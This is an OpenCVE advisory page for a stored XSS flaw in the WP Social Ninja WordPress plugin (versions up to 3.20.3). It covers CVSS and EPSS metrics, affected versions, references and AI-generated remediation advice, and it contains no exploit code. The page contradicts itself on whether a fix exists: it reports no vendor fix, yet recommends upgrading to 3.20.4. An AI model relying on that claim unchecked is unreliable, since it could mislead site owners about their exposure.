CVE-2025-13007 - Vulnerability Details

- WP Social Ninja – Embed Social Feeds, Customer Reviews, Chat Widgets (Google Reviews, YouTube Feed, Photo Feeds, and More) <= 3.20.3 - Unauthenticated Stored Cross-Site Scripting via External Content Import

Description

The WP Social Ninja – Embed Social Feeds, Customer Reviews, Chat Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.20.3 due to insufficient input sanitization and output escaping on externally-sourced content. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, granted they can post malicious content to a connected Google Business Profile or Facebook page.

Published: 2025-12-02

Score: 6.1 Medium

EPSS: < 1% Very Low

KEV: No

Impact:

Action:

Analysis

Impact

The WP Social Ninja plugin, a WordPress add‑on that aggregates content such as Google Reviews and YouTube feeds, contains a stored XSS flaw that lets an unauthenticated user inject arbitrary JavaScript into pages that render imported external content. This vulnerability arises from insufficient sanitization and escaping of content retrieved from external services. An attacker who can post to a connected Google Business Profile or Facebook page could embed JavaScript that will execute whenever a site visitor loads the affected review page. While the vulnerability does not explicitly mention session hijacking or data exfiltration, such outcomes are a typical consequence of XSS and are thus inferred based on the behavior of client‑side code execution.

Affected Systems

WordPress sites running the WP Social Ninja plugin by adreastrian, versions up to and including 3.20.3. The flaw affects the review content rendering pathways that display externally sourced data.

Risk and Exploitability

The CVSS score of 6.1 classifies the issue as moderate severity, while an EPSS score of less than 1% indicates low current exploitation probability. The vulnerability is not listed in the CISA KEV catalog, reflecting a limited known exploitation footprint. The attack requires the ability to post content to an external business profile; once compromised, the injected script executes in the browsers of any visitor who views the compromised review page, giving the attacker client‑side code execution.

Default status is the baseline for the product, each version can override it (e.g. patched versions marked unaffected).

Vendor Product Default status Versions

adreastrian

WP Social Ninja – Embed Social Feeds, User Reviews & Chat Widgets

unaffected

Version	Status	Constraints
`0`	affected	≤ 3.20.3

No data.

Vendor	Product	Confidence	Versions
Wordpress	Wordpress	—	—

Found an issue or want to improve our Enrichment? You can suggest it directly by opening an issue on our dedicated GitHub repository .

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

Upgrade WP Social Ninja to the latest patch version (3.20.4 or newer) where input sanitization is fixed.
If an update cannot be applied immediately, consider disabling or uninstalling the plugin to remove the attack surface until a fix is installed.
Monitor external content sources for suspicious or unauthorized submissions; remove or quarantine any reviews that contain unexpected HTML before they are rendered.
Implement a strong Content Security Policy that blocks inline scripts on review pages and enable browser XSS protection.

Generated by OpenCVE AI on April 22, 2026 at 20:59 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

No CVSS v4.0

Attack Vector Network

Attack Complexity Low

Privileges Required None

Scope Changed

Confidentiality Impact Low

Integrity Impact Low

Availability Impact None

User Interaction Required

No CVSS v3.0

No CVSS v2

This CVE is not in the KEV list.

The EPSS score is 0.00171.

Exploitation none

Automatable no

Technical Impact partial

References

Link	Providers
https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/3.20.1/app/Services/Helper.php#L19
https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/3.20.1/app/Services/Platforms/Reviews/GoogleMyBusiness.php#L308
https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/3.20.1/app/Views/public/reviews-templates/elements/review-content.php#L7
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3397264%40wp-social-reviews%2Ftrunk&old=3392979%40wp-social-reviews%2Ftrunk&sfp_email=&sfph_mail=
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3400414%40wp-social-reviews%2Ftrunk&old=3397264%40wp-social-reviews%2Ftrunk&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/16c9ed4a-9e9f-4f10-b3fd-7f0db2c86112?source=cve

History

Wed, 03 Dec 2025 12:15:00 +0000

Type	Values Removed	Values Added
First Time appeared		Wordpress Wordpress wordpress
Vendors & Products		Wordpress Wordpress wordpress

Tue, 02 Dec 2025 15:15:00 +0000

Type	Values Removed	Values Added
Metrics		ssvc `{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}`

Tue, 02 Dec 2025 07:00:00 +0000

Type	Values Removed	Values Added
Description		The WP Social Ninja – Embed Social Feeds, Customer Reviews, Chat Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.20.3 due to insufficient input sanitization and output escaping on externally-sourced content. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, granted they can post malicious content to a connected Google Business Profile or Facebook page.
Title		WP Social Ninja – Embed Social Feeds, Customer Reviews, Chat Widgets (Google Reviews, YouTube Feed, Photo Feeds, and More) <= 3.20.3 - Unauthenticated Stored Cross-Site Scripting via External Content Import
Weaknesses		CWE-79
References		https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/3.20.1/app/Services/Helper.php#L19 https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/3.20.1/app/Services/Platforms/Reviews/GoogleMyBusiness.php#L308 https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/3.20.1/app/Views/public/reviews-templates/elements/review-content.php#L7 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3397264%40wp-social-reviews%2Ftrunk&old=3392979%40wp-social-reviews%2Ftrunk&sfp_email=&sfph_mail= https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3400414%40wp-social-reviews%2Ftrunk&old=3397264%40wp-social-reviews%2Ftrunk&sfp_email=&sfph_mail= https://www.wordfence.com/threat-intel/vulnerabilities/id/16c9ed4a-9e9f-4f10-b3fd-7f0db2c86112?source=cve
Metrics		cvssV3_1 `{'score': 6.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}`

Subscriptions

Wordpress Wordpress

MITRE

Status: PUBLISHED

Assigner: Wordfence

Published: 2025-12-02T06:40:24.247Z

Updated: 2026-04-08T16:37:14.689Z

Reserved: 2025-11-11T14:37:22.474Z

Link: CVE-2025-13007

Vulnrichment

Updated: 2025-12-02T14:16:29.348Z

NVD

Status : Deferred

Published: 2025-12-02T07:15:48.217

Modified: 2026-04-15T00:35:42.020

Link: CVE-2025-13007

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-22T21:00:06Z

Weaknesses

CWE-79

Impact

Affected Systems

Risk and Exploitability

Tracking

Attack Vector Network

Attack Complexity Low

Privileges Required None

Scope Changed

Confidentiality Impact Low

Integrity Impact Low

Availability Impact None

User Interaction Required

Exploitation none

Automatable no

Technical Impact partial

Subscriptions

JSON object

JSON object

JSON object

JSON object

JSON object